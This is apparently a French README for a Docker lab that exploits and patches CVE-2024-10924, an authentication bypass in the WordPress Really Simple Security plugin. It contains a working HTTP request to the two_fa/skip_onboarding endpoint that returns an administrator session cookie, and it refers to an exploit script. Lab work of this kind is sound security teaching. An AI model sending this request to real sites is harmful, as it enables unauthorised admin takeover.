
Démontre l'exploitation et l'atténuation de CVE-2024-10924, un contournement d'authentification dans WordPress Really Simple Security, avec un exploit Python automatisé, des étapes manuelles avec Burp Suite et la vérification du correctif.
CVE-2024-10924 - Contournement de l'authentification dans Really Simple Security
APERÇU Ce projet démontre l'exploitation et l'atténuation de CVE-2024-10924, une vulnérabilité critique de contournement de l'authentification dans le plugin WordPress « Really Simple Security ».
ÉTAPE 1 : CONFIGURATION DE L'ENVIRONNEMENT
Démarrez l'environnement WordPress vulnérable : cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d
Vérifiez que les conteneurs sont en cours d'exécution : docker ps
Accédez à WordPress : http://localhost:1337
Outils requis :
ÉTAPE 2 : ANALYSE DE VULNÉRABILITÉ
Lancez une analyse GVM sur la cible :
ÉTAPE 3 : EXPLOITATION
Méthode A - Exploitation Python automatisée : python exploit.py
Méthode B - Exploitation manuelle avec Burp Suite :
Interceptez le trafic vers http://localhost:1337
Envoyez la requête POST : POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json
{"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}
Observez la réponse avec l'en-tête Set-Cookie contenant la session administrateur
Résultat attendu :
ÉTAPE 4 : ATTÉNUATION
Appliquez le correctif pour bloquer le point de terminaison vulnérable : .\patch.ps1
Ce que cela fait :
ÉTAPE 5 : VÉRIFICATION
Relancez l'exploit (méthode A ou B) : python exploit.py
Résultat attendu après l'atténuation :
NOTES SUPPLÉMENTAIRES
Pour arrêter l'environnement : docker-compose down
Pour afficher les journaux des conteneurs : docker-compose logs -f
Pour accéder légitimement à l'administration WordPress : http://localhost:1337/wp-admin (Consultez docker-compose.yml pour les identifiants)